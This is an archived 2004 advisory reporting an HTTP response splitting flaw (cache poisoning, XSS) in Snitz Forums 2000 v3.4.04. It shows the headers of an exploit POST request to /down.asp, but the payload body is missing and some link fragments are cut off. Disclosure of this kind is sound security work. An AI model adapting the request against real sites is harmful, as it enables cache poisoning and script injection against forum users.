Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web BBS :: etc :: hack2071.htm

Snitz forums security hole (http response splitting)
ADVISORY: security hole (http response splitting) in snitz forums 2000

Author: Maestro (me!)
Date: 16-SEP-04
Vendor: Snitz Communications ( 
Product: Snitz Forums 2000 v3.4.04

Product description: (from vendor website) "the leading ASP forum/bbs on the internet today"

Problem: Http response splitting (web cache poisoning, xss, 
yadayadayada) - sponse.pdf

POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134


(replace curly braces with lessthan and greaterthan)

Vendor status: vendor contacted several times (email to support@ and to the contact email in the code). No response from vendor.

Find what you are looking for with the Lycos Yellow Pages ult.asp?SRC=lycos10

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH